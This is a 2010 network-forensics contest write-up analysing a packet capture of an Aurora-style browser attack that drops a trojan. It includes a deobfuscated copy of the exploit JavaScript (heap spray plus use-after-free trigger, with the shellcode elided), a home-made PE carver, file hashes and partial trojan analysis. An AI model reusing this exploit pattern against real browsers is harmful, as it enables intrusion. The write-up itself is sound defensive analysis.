Name: Candice Quates 

Description: 

The analysis so far, Puzzle #6, Ann DerCover and Vick Timmes.

Contents:

0.  Introduction and tools
1.  Packet capture major event timeline
2.  Questions answered by looking at pcap in Wireshark
3.  Questions answered by extracting files 
  3a. The file of javascript
  3b. Getting the executable / writing a carver
4.  So, what really happened? Where is the C&C?

0.  Introduction and tools

So we have an Aurora puzzle here.  There is a bit of mystery
as to how these attacks actually work; is Ann waiting on the other end
controlling Vick's every move, or is it all programmed in to the exploit
and trojan horse programs?  Amidst this we have been asked to come up
with answers to several packet-based questions, and some file-based
ones.  How far down the rabbit hole of javascript and exploit analysis
should we go?

Tools. Tools are fun.  
I used primarily wireshark on ubuntu for the plain packet analysis, and 
NetworkMiner in a Windows XP vmware instance to extract the initial HTTP
infection, as well as for a nice overview of sessions.  I used my own 
hastily written carver to extract the exe files from the "follow tcp stream, 
save as" dumps in wireshark, and checked my results of that against foremost. 
The free linux hex editor 'hte' (hte.sourceforge.net) can parse the PE
header data and disassemble without needing to boot into a vm to use a 
nice windows hex editor.  It's a little shaky for actual editing, though.

As I mentioned rabbit holes, until this puzzle I had only passing knowledge
of the javascript exploit vector, and I spent quite a bit of time reading
up on it.  Something also possessed me to write a carver in the middle of
the night, but I have wanted to make one of those to use as a basis for
other code for some time.  

1. Packet capture major event timeline 

Packet#|Time(s)|Event description
-------------------------------------------------------------
1	0.0	Vick clicks link http://10.10.10.10:8080/index.php
9	0.46	.gif file in iframe of index.php is requested
13	1.3	TCP session from vick to port 4444 begins
17	1.52	Packet containing start of EXE file on port 4444 arrives
1153	35.95	Connection attempts to port 4445 begin (and fail)
1562	87.6	Connection on port 4444 starts to ends
1565	87.6	Port 4444 finishes closing
1652	122.7	Start of successful port 4445 connection
1656	123.6	Successful connection handshake done on port 4445
1660   	123.9	EXE file download from port 4445 begins
2552	198.4	Connection on port 4445 starts to close
2554	198.4	Port 4445 finishes closing. Capture ends	

(This table uses tabs.  Hopefully it will survive cut and paste.) 

2.  Questions answered by looking at pcap in Wireshark

All of the above table data was found using wireshark.  I also plugged 
this pcap file into NetworkMiner, and found that NetworkMiner seemed to
ignore all the failed connection attempts.  Maybe I missed something,
but that struck me as odd.  The table above I pieced together from my
notes answering all of the different questions, as I had the packet
numbers and times all scribbled down on paper.  I took notes and kept
them ordered by date, and cleaned them up later, adding some missing
times and double-checking their locations.

One packet related question which was a little tedious was question #7.
I had to go figure out where in the wireshark settings you turn off the
automatic sequence number hiding, (preferences->protocols->tcp).  They
changed every third packet of the failed connection attempts, except 
for the first attempt, where it changed on the fourth packet.

I found out how to add a custom field to show the ip.id field to my
packet capture log, using the wonder of google and mailing lists. 
For that, go into preferences, and make a new column with a custom
type, and put 'ip.id' into the custom field.  That made the id numbers
come up very clearly, changing once per packet. 
  
For the port number changes part of problem #7, I made a table on paper
in notes which I'll reproduce here: 

Packet	Time	Port attempting to connect to 4445
-------------------------------------------------------------
1153	35.94	1037
1187	47.73	1038
1313	59.46	1039
1503	71.25	1040
1533	82.99	1041
1568	94.87	1042
1598	106.83	1043
1628	118.74	1044 <- success on this one, eventually

>From this capture, the source port changes roughly every twelve seconds.

3.  Questions answered by extracting files 

3a. Javascript

The first two files were nice and encapsulated in HTTP requests, and 
NetworkMiner came up with them easily.  'index.php' is full of obfuscated 
javascript.  It is pretty simple to use search and replace in a programming 
editor (I just used vi) to rename the long ugly variables into generic short 
things.  That made the entire process of tracing easier to work with.  
Variables named 1,2,3,4 are easier than gibberish.

(headers removed)
var var1 = "COMMENT";
var var2 = new Array();
for (i = 0; i < 1300; i++)
{
  var2[i] = document.createElement(var1);
  var2[i].data = "vEI";   # answer #2
}
var var3 = null;
var var4 = new Array();
var unescapefunc = unescape;
function func1()
{
  var var5 = unescapefunc( '%u.......huge block of shellcode
  var var6 = unescapefunc( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );
  do { var6 += var6 } while( var6.length < 0xd0000 );
  for (PEf = 0; PEf < 150; PEf++) var4[PEf] = var6 + var5;
}
function func2(func2arg)
{
  func1();
  var3 = document.createEventObject(func2arg);
  document.getElementById("element").innerHTML = "";
  window.setInterval(func3, 50);
}
function func3()
{
  p = "\u0c0f\u0c0d...shellcode-looking stuff
  for (i = 0; i < var2.length; i++)
  {
    var2[i].data = p;
  }
  var t = var3.srcElement;
}
X/scriptX
X/headX
XbodyX
Xspan id="element"XXiframe src="/index.phpmfKSxSANkeTeNrah.gif" onload="func2(event)" /XX/spanXX/bodyXX/htmlX

At the end here, you can clearly see the URL of the gif file, which launches
our function, and runs the exploit.  I'm not entirely clear how the giant
block of shellcode does its magic, but I did extract it with spidermonkey
and look at it.  Deep analysis of javascript-based shellcode is not something 
I've done before, and after starting that I realized I might not finish the 
puzzle if I kept it up.  It definitely got me started learning about how
browser based attacks work, and I'll definitely take a closer look at it later.

>From what I can understand, the iframe loads the gif file, which by the 
onload call, runs func2() which runs func1() with its giant shellcode 
block, sets some stuff, and then sets up a 50 ms loop with window.setInterval
to run func3() over and over again.  

I think that func1() contains the exploit (and maybe the port 4444 connection),
and the loop running func3() may be the other connect-back attempts.  The 
packet capture doesn't really help me figure this out.
  
As for the md5 of the .gif file: df3e567d6f16d040326c7a0ea29a4f41  
index.phpmfKSxSANkeTeNrah.gif

3b. Getting the executable freed

So, I found the two port 4444 and 4445 tcp executable streams pretty easily,
and separated them out into server->client only in wireshark "follow tcp 
stream" and saved each.  They both contain a bunch of junk before the MZ,
and it's not immediately apparent how big the executables within are.

-rw-r--r-- 1 833133 2010-06-23 19:53 puzzle6-packet1656stream.raw
-rw-r--r-- 1 1239098 2010-06-23 19:52 puzzle6-packet17stream.raw

I opened one up in a hex editor (hte again) and deleted off the first few
characters, closed it, and got into the PE header information, trying to
figure out how to calculate the file size.  Puzzled at it for a while,
considering there is no raw image filesize file in th PE spec, and realized
that the last section information is the key: in the last entry of the
section header table, it has the offset to the last file section and
it's size.  Adding these two together would produce the filesize.  

I went and pulled up the finished executable from forensics puzzle #5,
fired up the editor, and a hex calculator, dug down to the two values
and there it was, the size.

Now, how to do that with a program?  In my case, C and fseek.  (Yes,
I could have just used foremost, I know.  But this only took a little
over two hours late one evening, and it was fun.)  The program searched
for MZ, PE and then consumed bytes to get their values and added offsets
to get to the next part of information.  I wrote the program using a PE 
file to test the output, step by step, that did not need to be carved so 
as to have a clear place to start. (Again, the puzzle #5 executable.)

Then I tried running it on both executables.  I got the same file for 
both, plugged the md5 into virustotal and came up with nothing; then I
looked at my extracted files a little more carefully and realized they
were one byte too big.  Fixing the program to carve off on an even
number of bytes (PE files always end on padded boundaries, I'm not sure
it's possible to have one with an odd size) and it found something that
looked like malware!

-rw------- 1 748032 2010-06-26 22:43 pefileL995r

b062cb8344cd3e296d8868fbef289c7c  pefileL995r

http://www.virustotal.com/analisis/14f489f20d7858d2e88fdfffb594a9e5f77f1333c7c479f6d3f1b48096d382fe-1276598794

As well, somewhere in this process I decided to run foremost on the 
packet captures as well, and it came up with the same md5 as I have here. 

At this point, having checked out the file well enough without really going
into the nuts and bolts, I went on to try to finish up the puzzle and see
why all of these different things happened, because there is a lot of
unexplained extra traffic after these files are downloaded on the port 4444
and 4445 connections.

If there is any time left before contest end I will sandbox this and get
back to you guys.  

4.  So, what really happened? Where is the C&C?

To be honest?  I'm not entirely sure.  The traffic on the port 4444 
connection after the PE file ends looks like gobbledygook.  I did 
some unix tricks to split the end off (split -b) and did a find in 
wireshark to find the packet where it ends, which is about at packet 
607, which is well before the port 4445 connection attempts start. 

There are a lot of imports and exports in the file we downloaded,
which doesn't seem right for normal malware, but a lot of them are
"connection" functions, probably for connecting into a botnet or
something of that nature.  Assuming Ann was planning more after
she got the trojan to run on this machine.

Perhaps a quick behavioral analysis will get us some more leads?  
No, not really, at least in my sandbox setup.  I fed the binary to
it, and it just checked a bunch of stuff in the registry and exited.

I noticed though, that the binary doesn't really look packed at all,
so I put it into IDApro (free) and started digging.  It's got some simple
anti-debugger tricks at the dll entry point (SEH and a system call 
to "IsDebuggerPresent) and actually has imports and exports present,
which is pretty weird, I thought.  It looks like OpenSSL (0.98k) 
and Zlib are linked in static, because the strings for their code
are all in the resources section.  I started chasing malware-ish
looking functions in the exports section back up through the code,
and found possible evidence of a keylogger (ReadConsoleInputA) and
of process memory modification (WriteProcessMemory) which is hooking
other code to hide itself.  Looks like a trojan to me, but I have
not found the source of the communications code; I found lots of
create packet/recieve packet/send packet sort of functions, but not
anything to help me answer the question: why did the port 4445  
download start?  

>From here I am out of time, and I hope you like my analysis,
incomplete as it may be.


Candice Quates, June 2010.